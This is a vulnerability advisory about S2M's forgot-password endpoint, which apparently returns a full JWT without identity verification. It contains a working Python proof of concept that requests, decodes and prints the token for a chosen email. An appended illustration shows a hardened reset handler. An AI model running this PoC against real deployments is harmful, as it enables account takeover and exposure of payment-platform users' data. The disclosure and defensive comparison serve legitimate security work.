S2M Forgot Password Endpoint Token Exposure

11 May 2026 00:00:00 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

S2M forgot-password API exposes full JWT in response; a Python script retrieves and decodes it.

Code
    ==================================================================================================================================
    | # Title     : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://s2mworldwide.com/en/                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Python script demonstrates a security assessment of a forgot-password API endpoint in a digital payment platform operated by S2M,
                     a company specializing in secure electronic transactions and payment processing solutions.
                     The script sends a crafted POST request containing a known email address and retrieves a JWT (JSON Web Token) directly from the server response; the server returns it without proper identity verification.
    
    [+] If successful, the script:
    
        - Extracts and displays the full JWT token
        - Decodes the token payload (base64)
        - Parses and prints sensitive information, including:
            - User-related data
            - Account status (userStatus)
            - Token expiration time (exp)
    
    [+] Security Impact:
    This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
    
        - Account Takeover
        - Sensitive Information Disclosure
        - Weak Password Reset Mechanism
    
    [+] POC   :  
    
    
    import base64
    import json
    from datetime import datetime
    
    import requests
    import urllib3
    
    # The test host in this PoC uses a self-signed certificate; silence the TLS warning.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
    EMAIL = "[email protected]"
    
    
    def decode_jwt_payload(token):
        """Decode the middle (payload) segment of the JWT and return it as a dict."""
        try:
            parts = token.split('.')
            if len(parts) != 3:
                return "Invalid token format"
            payload = parts[1]
            # JWT segments are unpadded base64url; restore the padding before decoding.
            payload += '=' * (-len(payload) % 4)
            decoded = base64.urlsafe_b64decode(payload).decode('utf-8')
            return json.loads(decoded)
        except Exception as e:
            return f"Token content extraction failed: {e}"
    
    
    def get_full_token():
        session = requests.Session()
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Content-Type": "application/json",
        })
        try:
            print(f"[*] Extracting full account token: {EMAIL}")
            # The forgot-password endpoint answers with the JWT in its JSON body.
            res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
            data = res.json()
            token = data.get('token')
            status = data.get('userStatus')
    
            if token:
                print("\n" + "=" * 30 + " Full token (JWT) " + "=" * 30)
                print(token)
                print("=" * 81 + "\n")
    
                print("[*] Token Content Parsing (Decoded Payload):")
                payload_info = decode_jwt_payload(token)
                print(json.dumps(payload_info, indent=4, ensure_ascii=False))
    
                print(f"\n[!] Current User Status: {status}")
    
                if isinstance(payload_info, dict) and 'exp' in payload_info:
                    exp_date = datetime.fromtimestamp(payload_info['exp'])
                    print(f"[!] Token valid until: {exp_date}")
            else:
                print("[-] No token found in server response.")
                print(f"[*] Full response: {data}")
        except Exception as e:
            print(f"[X] Error: {e}")
    
    
    if __name__ == "__main__":
        get_full_token()
    
    Greetings to: jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
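As an added illustration that is not part of the advisory or of S2M's code, the pattern the advisory describes is shown beside a hardened forgot-password handler: the reset credential is stored server-side only as a hash with a short expiry, delivered out-of-band, redeemable once, and never returned in the HTTP response. The user store, outbox, token format and TTL are constructed assumptions standing in for the platform's database, mailer and JWT.

```python
import hashlib
import secrets
import time

# Constructed stand-ins (assumptions): a user store, the server-side table of
# outstanding reset tokens keyed by sha256(token), and an "outbox" that plays
# the role of the e-mail sender.
USERS = {"user@example.com": {"userStatus": "ACTIVE"}}
RESET_TOKENS = {}   # sha256 hex digest -> (email, expiry as epoch seconds)
OUTBOX = []         # the only place the plaintext token is allowed to go
RESET_TTL_SECONDS = 15 * 60

def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()

def forgot_password_vulnerable(email, now=None):
    """The pattern the advisory describes: the reset credential (a JWT on the
    real platform, a random token here) comes back in the response body, so
    anyone who can submit the e-mail address holds the credential."""
    now = time.time() if now is None else now
    user = USERS.get(email)
    if user is None:
        return {"error": "unknown user"}        # also confirms which accounts exist
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[_digest(token)] = (email, now + RESET_TTL_SECONDS)
    return {"token": token, "userStatus": user["userStatus"]}

def forgot_password_hardened(email, now=None):
    """Same request, fixed handling: identical generic response for known and
    unknown addresses, token stored only as a hash, delivered out-of-band."""
    now = time.time() if now is None else now
    if email in USERS:
        token = secrets.token_urlsafe(32)
        RESET_TOKENS[_digest(token)] = (email, now + RESET_TTL_SECONDS)
        OUTBOX.append({"to": email, "reset_token": token})
    return {"message": "If that address is registered, a reset link has been sent."}

def redeem_reset_token(token, now=None):
    """Return the e-mail the token authorises, or None. Single use (the hash is
    removed on first redemption) and rejected after RESET_TTL_SECONDS."""
    now = time.time() if now is None else now
    entry = RESET_TOKENS.pop(_digest(token), None)
    if entry is None or now > entry[1]:
        return None
    return entry[0]
```

The hardened response carries neither the token nor the userStatus field the PoC prints, so the only way to redeem a reset is to read the out-of-band message.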
